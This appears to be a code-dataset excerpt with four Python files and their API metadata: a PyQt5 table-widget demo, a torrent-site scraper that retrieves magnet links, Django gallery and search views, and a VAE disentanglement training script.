self.ui.tableInfo.resizeColumnsToContents()\n\n @pyqtSlot(bool) ##表格可编辑\n def on_chkBoxEditable_clicked(self,checked): \n if (checked):\n trig=QAbstractItemView.DoubleClicked | QAbstractItemView.SelectedClicked\n else:\n trig=QAbstractItemView.NoEditTriggers #不允许编辑\n self.ui.tableInfo.setEditTriggers(trig) #不允许编辑\n\n @pyqtSlot(bool) ##交替行颜色\n def on_chkBoxRowColor_clicked(self,checked): \n self.ui.tableInfo.setAlternatingRowColors(checked)\n\n @pyqtSlot(bool) ##是否显示水平表头\n def on_chkBoxHeaderH_clicked(self,checked): \n self.ui.tableInfo.horizontalHeader().setVisible(checked)\n\n @pyqtSlot(bool) #是否显示垂直表头\n def on_chkBoxHeaderV_clicked(self,checked): \n self.ui.tableInfo.verticalHeader().setVisible(checked)\n\n @pyqtSlot() ##选择行为:行选择\n def on_radioSelectRow_clicked(self): \n selMode=QAbstractItemView.SelectRows\n self.ui.tableInfo.setSelectionBehavior(selMode)\n \n @pyqtSlot() ##选择行为:单元格选择\n def on_radioSelectItem_clicked(self):\n selMode=QAbstractItemView.SelectItems\n self.ui.tableInfo.setSelectionBehavior(selMode)\n\n\n @pyqtSlot() ##读取表格到文本\n def on_btnReadToText_clicked(self): \n self.ui.textEdit.clear()\n rowCount=self.ui.tableInfo.rowCount() #行数\n colCount=self.ui.tableInfo.columnCount() #列数\n for i in range(rowCount):\n strText=\"第 %d 行: \" %(i+1)\n for j in range(colCount-1):\n cellItem=self.ui.tableInfo.item(i,j)\n strText =strText+cellItem.text()+\" \"\n cellItem=self.ui.tableInfo.item(i,colCount-1) #最后一列\n if (cellItem.checkState() == Qt.Checked):\n strText=strText+\"党员\"\n else:\n strText=strText+\"群众\"\n 
self.ui.textEdit.appendPlainText(strText)\n\n\n @pyqtSlot(int,int,int,int) ##当前单元格发生变化\n def on_tableInfo_currentCellChanged(self,currentRow,currentColumn,\n previousRow,previousColumn):\n if (self.__tableInitialized ==False): #表格数据未初始化\n return\n item=self.ui.tableInfo.item(currentRow,currentColumn)#当前单元格\n if (item == None):\n return\n\n self.LabCellIndex.setText(\"当前单元格:%d 行,%d 列\"\n %(currentRow,currentColumn))\n\n itemCellType=item.type() #获取单元格的类型\n self.LabCellType.setText(\"当前单元格类型:%d\" %itemCellType)\n\n item2=self.ui.tableInfo.item(currentRow,FieldColNum.colName.value)\n studID=item2.data(Qt.UserRole) #读取用户自定义数据\n self.LabStudID.setText(\"学生ID:%d\" %studID)\n \n## =============自定义槽函数=============================== \n\n\n \n## ============窗体测试程序 ================================ \nif __name__ == \"__main__\": #用于当前窗体测试\n app = QApplication(sys.argv) #创建GUI应用程序\n form=QmyMainWindow() #创建窗体\n form.show()\n sys.exit(app.exec_())\n", "sub_path": "pyqt/DemoFullCode-PythonQt/chap03Widgets/Demo3_10TableWidget/myMainWindow.py", "file_name": "myMainWindow.py", "file_ext": "py", "file_size_in_byte": 9845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 30, "usage_type": "name"}, {"api_name": "ui_MainWindow.Ui_MainWindow", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 58, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 58, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 58, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.UserRole", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 72, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 78, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 82, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 83, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 85, 
"usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.blue", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 91, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 91, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 91, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.Checked", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Unchecked", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsSelectable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 101, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsEnabled", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsUserCheckable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.yellow", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 102, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 114, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 119, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.red", "line_number": 119, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 132, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate.fromString", "line_number": 156, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 156, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 152, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate.fromString", "line_number": 163, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 163, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 159, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 166, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 171, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 175, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 179, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.DoubleClicked", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectedClicked", 
"line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.NoEditTriggers", "line_number": 188, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 188, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 183, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 191, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 195, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectRows", "line_number": 205, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 205, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectItems", "line_number": 210, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 210, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 208, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Checked", "line_number": 225, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 225, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 214, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.UserRole", "line_number": 248, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 248, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 232, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 257, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 257, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 260, "usage_type": "call"}]}
+{"seq_id": "228029764", "text": "import pyperclip\nfrom bs4 import BeautifulSoup\nimport requests\n# import magurn.proxy as proxy\n\nprint(\"Initializing....\")\n\n\ndef copyToClipBoard(text):\n pyperclip.copy(text)\n\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\"\n}\n\n# Takes about 5 seconds to get proxy url\n# piratebay_proxy_base_url = proxy.get_piratebay_proxy_url()\n\n\ndef check(search, link):\n srch_vrf = 0\n for nt in search.lower().split():\n if nt in link.text.lower():\n srch_vrf += 1\n if srch_vrf < len(search.lower().split()):\n return False\n else:\n return True\n\n\ndef _1337x(search):\n url_f = []\n search_l = search.split()\n search_name = \"+\".join(search_l)\n\n # base_url = \"https://1337x.to\"\n base_url = \"https://1337xto.eu\" # PROXIED URL\n req_url = base_url + \"/sort-search/\" + str(search_name) + \"/time/desc/1/\"\n try:\n res = requests.get(req_url, headers=headers)\n except:\n print(\"\\nERROR in accessing 1337x: Please Use VPN or Proxy\\n\")\n return\n soup = BeautifulSoup(res.content, features=\"html.parser\")\n c = False\n data_cnt = 0\n for row in soup.find_all(\"tr\"):\n if not c:\n c = True\n continue\n\n link_data = row.find_all(\"a\")\n link = link_data[1]\n\n if not check(search, link):\n continue\n\n url_f.append(base_url + link.get(\"href\"))\n names.append(link.text.strip())\n\n uploaded.append(row.find('td', attrs={'class': 'coll-date'}).text)\n\n size = row.find(\"td\", attrs={\"class\": \"size\"})\n sizes.append(size.find(text=True))\n\n data_cnt += 1\n if data_cnt == 2:\n break\n\n for url in url_f:\n url_res = requests.get(url, headers=headers)\n urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n for seed in urlsoup.find_all(\"span\", {\"class\": \"seeds\"}):\n seeds.append(int(seed.text))\n\n for magnet in urlsoup.find_all(\"a\"):\n try:\n if \"magnet\" in magnet.text.split()[0].lower():\n magnets.append(magnet.get(\"href\"))\n except:\n pass\n\n\ndef idope(search):\n url_f = []\n # base_url = \"https://idope.se\"\n base_url = \"https://gv6zipaqcoaau4qe.onio.icu\" # PROXIED URL\n req_url = base_url + \"/torrent-list/\" + str(search) + \"/?&o=-3\"\n try:\n res = requests.get(req_url, headers=headers)\n except:\n print(\"\\nERROR in accessing idope: Please Use VPN or Proxy\\n\")\n return\n\n soup = BeautifulSoup(res.content, features=\"html.parser\")\n\n data_cnt = 0\n for div in soup.find_all(\"div\", attrs={\"class\": \"resultdiv\"}):\n link = div.find(\"a\")\n\n if not check(search, link):\n continue\n\n uploaded.append(\n str(div.find('div', attrs={'class': 'resultdivbottontime'}).text) + \" Ago\")\n url_f.append(base_url + link.get(\"href\"))\n names.append(link.text.strip())\n\n seed = div.find(\"div\", {\"class\": \"resultdivbottonseed\"})\n seeds.append(int(seed.text))\n\n size = div.find(\"div\", {\"class\": \"resultdivbottonlength\"})\n sizes.append(size.text.strip().replace(u\"\\xa0\", u\" \"))\n\n data_cnt += 1\n if data_cnt == 2:\n break\n\n for url in url_f:\n url_res = requests.get(url, headers=headers)\n urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n for magnet in urlsoup.find_all(id=\"mangetinfo\"):\n magnets.append(magnet.text.strip())\n\n\ndef piratebay(search):\n url_f = []\n # base_url = \"https://thepiratebay.org\"\n base_url = \"https://247prox.link\" # PROXIED URL\n # base_url = piratebay_proxy_base_url\n\n req_url = base_url + \"/search/\" + search + \"/0/3/0\"\n try:\n res = requests.get(req_url, 
headers=headers)\n    except:\n        print(\"\\nERROR in accessing PirateBay: Please Use VPN or Proxy\\n\")\n        return\n\n    soup = BeautifulSoup(res.content, features=\"html.parser\")\n    data_count = 0\n    c = False\n    for tr in soup.find_all(\"tr\"):\n        if not c:\n            c = True\n            continue\n\n        link = tr.div.a\n\n        if not check(search, link):\n            continue\n\n        names.append(link.text.strip())\n\n        url_f.append(str(base_url + link.get(\"href\")))\n\n        size_data = tr.font.text.split(\",\")[1].strip()\n        size_value = size_data.split()[1]\n        size_type = size_data.split()[2].replace(\"i\", \"\")\n        size = str(size_value + \" \" + size_type)\n        sizes.append(size)\n\n        td = tr.find_all(\"td\")\n        seeds.append(int(td[-2].text))\n\n        data_count += 1\n        if data_count == 2:\n            break\n\n    for url in url_f:\n        url_res = requests.get(url, headers=headers)\n        urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n\n        uploaded.append(urlsoup.find_all('dd')[-6].text.split()[0])\n\n        div = urlsoup.find(\"div\", attrs={\"class\": \"download\"})\n\n        magnets.append(div.a.get(\"href\"))\n\n\nwhile True:\n    tor_seed = {}\n    names = []\n    seeds = []\n    magnets = []\n    sizes = []\n    uploaded = []\n\n    searchterm = input(\"Enter the name of torrent you want to search\\n\")\n\n    print(\"Scraping from idope....\")\n    idope(searchterm)\n\n    print(\"Scraping from 1337x....\")\n    _1337x(searchterm)\n\n    print(\"Scraping from PirateBay....\")\n    piratebay(searchterm)\n\n    if not names:\n        print(\"\\nNothing Found\\n\")\n        continue\n\n    # Convert sizes to MB\n    size_in_mb = []\n    for sizedata in sizes:\n        sizesplit = sizedata.split()\n        size = float(sizesplit[0])\n        type_size = sizesplit[1]\n        if type_size == \"B\":\n            size_mb = size / (1024 * 1024)\n        elif type_size == \"KB\":\n            size_mb = size / 1024\n        elif type_size == \"MB\":\n            size_mb = size\n        elif type_size == \"GB\":\n            size_mb = size * 1024\n        elif type_size == \"TB\":\n            size_mb = size * 1024 * 1024\n        else:\n            size_mb = size # unknown unit: treat as MB so size_mb is always bound\n        size_in_mb.append(size_mb)\n\n    score = []\n    for i in range(len(sizes)):\n        score.append(seeds[i]/size_in_mb[i])\n\n    tor_seed[\"Names\"] = names\n    tor_seed[\"Sizes\"] = sizes\n    tor_seed[\"Seeders\"] = seeds\n    tor_seed[\"Uploaded\"] = uploaded\n    tor_seed[\"SizesMB\"] = size_in_mb\n    tor_seed[\"Magnets\"] = magnets\n    tor_seed[\"Score\"] = score\n\n    maxIndex = score.index(max(score))\n\n    print(\"Name: \" + tor_seed[\"Names\"][maxIndex])\n    print(\"Size: \" + tor_seed[\"Sizes\"][maxIndex])\n    print(\"Seeds:\", tor_seed[\"Seeders\"][maxIndex])\n    print(\"Uploaded:\", tor_seed[\"Uploaded\"][maxIndex])\n    print(\"Magnet Link:\\n\" + tor_seed[\"Magnets\"][maxIndex])\n    try:\n        copyToClipBoard(tor_seed[\"Magnets\"][maxIndex])\n        print(\"Magnet Copied to ClipBoard\")\n    except:\n        pass\n    print(\"\\nPress Ctrl+C to Close\\n\")\n", "sub_path": "magurn/TorrentSearch.py", "file_name": "TorrentSearch.py", "file_ext": "py", "file_size_in_byte": 6812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pyperclip.copy", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 96, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 121, "usage_type": "call"}, {"api_name": 
"bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 135, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 140, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 171, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "466391873", "text": "from django.shortcuts import render #rendering of templates\nfrom django.http import HttpRequest #handles the post and the get methods from the user\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger #handles massive pages\nfrom django.views.generic import DetailView#allows detailed view for album\nfrom .email import send_welcome_email#imports the function that allows sending email to different recepients\nfrom app.models import Album, AlbumImage#importing from our models the classes album and albumimage\n\n\ndef gallery(request):\n #desplaying the albums as list of pages containining 10 albums per page\n list = Album.objects.filter(is_visible=True).order_by('-created')\n paginator = Paginator(list, 10)\n\n page = request.GET.get('page')\n try:\n albums = paginator.page(page)\n except PageNotAnInteger:\n albums = paginator.page(1) # If page is not an integer, deliver first page.\n except EmptyPage:\n albums = paginator.page(paginator.num_pages) # If page is out of range (e.g. 9999), deliver last page of results.\n\n return render(request, 'gallery.html', { 'albums': list })\n\n#defining the newletter function\ndef newsletter(request):\n name = request.POST.get('your_name')\n email = request.POST.get('email')\n\n recipient = NewsLetterRecipients(name=name, email=email)\n recipient.save()\n send_welcome_email(name, email) #sending the newsletter email to the resipient with the details provided\n data = {'success': 'You have been successfully added to mailing list'}\n return JsonResponse(data)\n\nclass AlbumDetail(DetailView):#defines what should be presented in the detail view\n model = Album\n\n def get_context_data(self, **kwargs):# accept declaring a variables and the amount within the function arguments\n # Call the base implementation first to get a context\n context = super(AlbumDetail, self).get_context_data(**kwargs)# accept declaring a variables and the amount within the function arguments\n # Add in a QuerySet of all the images\n context['images'] = AlbumImage.objects.filter(album=self.object.id)\n return context\ndef search_results(request):#searching album by tittle \n\n if 'album' in request.GET and request.GET[\"album\"]:\n search_term = request.GET.get(\"album\")#brings the album\n searched_albums = Album.search_by_title(search_term)#brings the tittle in the brought album\n message = f\"{search_term}\"\n\n return render(request, 'search.html',{\"message\":message,\"albums\": searched_albums})\n\n else:#define what happens if the album is not found\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',{\"message\":message})\n\n\ndef handler404(request, exception):#handle the not found errors\n assert isinstance(request, HttpRequest)\n return render(request, 'handler404.html', None, None, 404)", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "app.models.Album.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "app.models.Album.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.models.Album", "line_number": 11, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 12, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", 
"line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "email.send_welcome_email", "line_number": 31, "usage_type": "call"}, {"api_name": "django.views.generic.DetailView", "line_number": 35, "usage_type": "name"}, {"api_name": "app.models.Album", "line_number": 36, "usage_type": "name"}, {"api_name": "app.models.AlbumImage.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "app.models.AlbumImage.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.models.AlbumImage", "line_number": 42, "usage_type": "name"}, {"api_name": "app.models.Album.search_by_title", "line_number": 48, "usage_type": "call"}, {"api_name": "app.models.Album", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpRequest", "line_number": 59, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "451554588", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.\n# Licensed under the Apache License, Version 2.0 (the \"License\")\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# --- File Name: main_group_v2.py\n# --- Creation Date: 29-09-2020\n# --- Last Modified: Wed 07 Oct 2020 02:50:28 AEDT\n# --- Author: Xinqi Zhu\n# .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<\n\"\"\"\nMain training for GroupV2VAE.\nCode borrowed from disentanglement_lib.\n\"\"\"\n\n# We group all the imports at the top.\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport sys\n# Insert disentanglement_lib to path.\nsys.path.insert(\n 0,\n os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),\n 'disentanglement_lib'))\nfrom disentanglement_lib.config import reproduce\nfrom disentanglement_lib.evaluation import evaluate\nfrom disentanglement_lib.evaluation.metrics import utils\nfrom disentanglement_lib.methods.unsupervised import train\nfrom disentanglement_lib.methods.unsupervised import vae\nfrom disentanglement_lib.postprocessing import postprocess\nfrom disentanglement_lib.utils import aggregate_results\nfrom disentanglement_lib.visualize import visualize_model\nfrom disentanglement_lib.utils import resources\nimport argparse\nimport glob\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nimport gin.tf\n\nfrom group_v2_models import GroupV2VAE\nfrom group_v2_architectures import group_v2_deconv_decoder\nfrom utils import _str_to_bool\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Project description.')\n parser.add_argument('--result_dir',\n help='Results directory.',\n type=str,\n default='/mnt/hdd/repo_results/Ramiel/group_v2_sweep')\n parser.add_argument('--study',\n help='Name of the study.',\n type=str,\n default='unsupervised_study_v1')\n parser.add_argument('--eval_only',\n help='Whether to train.',\n type=_str_to_bool,\n default=False)\n parser.add_argument('--model_gin',\n help='Name of the gin config.',\n type=str,\n default='group_v2_model.gin')\n parser.add_argument('--hyps',\n help='Hyperparameters of gmat_hes_lin_seed.',\n type=str,\n default='0_0_0_1_0')\n parser.add_argument('--group_feats_size',\n help='Hyperparameters of group_feats_size.',\n type=str,\n default='400')\n parser.add_argument('--lie_alg_init_scale',\n help='Hyperparameters of lie_alg_init_scale.',\n type=str,\n default='0.001')\n parser.add_argument('--lie_alg_init_type',\n help='Hyperparameters of lie_alg_init_type.',\n type=str,\n default='none')\n parser.add_argument('--n_act_points',\n help='Hyperparameters of n_act_points.',\n type=str,\n default='10')\n parser.add_argument('--overwrite',\n help='Whether to overwrite output directory.',\n type=_str_to_bool,\n default=False)\n parser.add_argument('--dataset',\n help='Dataset.',\n type=str,\n default='dsprites_full')\n parser.add_argument('--recons_type',\n help='Reconstruction loss type.',\n type=str,\n default='bernoulli_loss')\n args = parser.parse_args()\n\n # 1. 
Settings\n study = reproduce.STUDIES[args.study]\n args.hyps = args.hyps.split('_')\n print()\n study.print_postprocess_config()\n print()\n study.print_eval_config()\n\n gpus = tf.config.experimental.list_physical_devices('GPU')\n if gpus:\n try:\n # Currently, memory growth needs to be the same across GPUs\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus),\n \"Logical GPUs\")\n except RuntimeError as e:\n # Memory growth must be set before GPUs have been initialized\n print(e)\n\n # Call training module to train the custom model.\n dir_name = \"GroupV2VAE-\" + \"-\".join(args.hyps) + \\\n '-' + args.lie_alg_init_type + \\\n '-' + str(args.lie_alg_init_scale) + \\\n '-' + str(args.group_feats_size)\n output_directory = os.path.join(args.result_dir, dir_name)\n model_dir = os.path.join(output_directory, \"model\")\n gin_bindings = [\n \"GroupV2VAE.hy_gmat = \" + args.hyps[0],\n \"GroupV2VAE.hy_hes = \" + args.hyps[1],\n \"GroupV2VAE.hy_lin = \" + args.hyps[2],\n \"group_v2_deconv_decoder.hy_ncut = \" + args.hyps[3],\n \"group_v2_deconv_decoder.group_feats_size = \" + args.group_feats_size,\n \"group_v2_deconv_decoder.lie_alg_init_scale = \" + args.lie_alg_init_scale,\n \"group_v2_deconv_decoder.lie_alg_init_type = '\" + args.lie_alg_init_type + \"'\",\n \"group_v2_deconv_decoder.n_act_points = \" + args.n_act_points,\n \"model.random_seed = \" + args.hyps[4],\n \"dataset.name = '\" + args.dataset + \"'\",\n \"reconstruction_loss.loss_fn = @\" + args.recons_type\n ]\n if not args.eval_only:\n train.train_with_gin(model_dir, args.overwrite, [args.model_gin],\n gin_bindings)\n\n # We fix the random seed for the postprocessing and evaluation steps (each\n # config gets a different but reproducible seed derived from a master seed of\n # 0). 
The model seed was set via the gin bindings and configs of the study.\n random_state = np.random.RandomState(0)\n\n # We extract the different representations and save them to disk.\n postprocess_config_files = sorted(study.get_postprocess_config_files())\n for config in postprocess_config_files:\n post_name = os.path.basename(config).replace(\".gin\", \"\")\n print(\"Extracting representation \" + post_name + \"...\")\n post_dir = os.path.join(output_directory, \"postprocessed\", post_name)\n postprocess_bindings = [\n \"postprocess.random_seed = {}\".format(random_state.randint(2**32)),\n \"postprocess.name = '{}'\".format(post_name)\n ]\n postprocess.postprocess_with_gin(model_dir, post_dir, args.overwrite,\n [config], postprocess_bindings)\n\n # Iterate through the disentanglement metrics.\n eval_configs = sorted(study.get_eval_config_files())\n blacklist = ['downstream_task_logistic_regression.gin']\n # blacklist = [\n # 'downstream_task_logistic_regression.gin', 'beta_vae_sklearn.gin',\n # 'dci.gin', 'downstream_task_boosted_trees.gin', 'mig.gin',\n # 'modularity_explicitness.gin', 'sap_score.gin', 'unsupervised.gin'\n # ]\n for config in postprocess_config_files:\n post_name = os.path.basename(config).replace(\".gin\", \"\")\n post_dir = os.path.join(output_directory, \"postprocessed\", post_name)\n # Now, we compute all the specified scores.\n for gin_eval_config in eval_configs:\n if os.path.basename(gin_eval_config) not in blacklist:\n metric_name = os.path.basename(gin_eval_config).replace(\n \".gin\", \"\")\n print(\"Computing metric \" + metric_name + \" on \" + post_name +\n \"...\")\n metric_dir = os.path.join(output_directory, \"metrics\",\n post_name, metric_name)\n eval_bindings = [\n \"evaluation.random_seed = {}\".format(\n random_state.randint(2**32)),\n \"evaluation.name = '{}'\".format(metric_name)\n ]\n evaluate.evaluate_with_gin(post_dir, metric_dir,\n args.overwrite, [gin_eval_config],\n eval_bindings)\n\n # We visualize reconstructions, samples and latent space traversals.\n visualize_dir = os.path.join(output_directory, \"visualizations\")\n visualize_model.visualize(model_dir, visualize_dir, args.overwrite)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "main_group_v2.py", "file_name": "main_group_v2.py", "file_ext": "py", "file_size_in_byte": 8653, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": 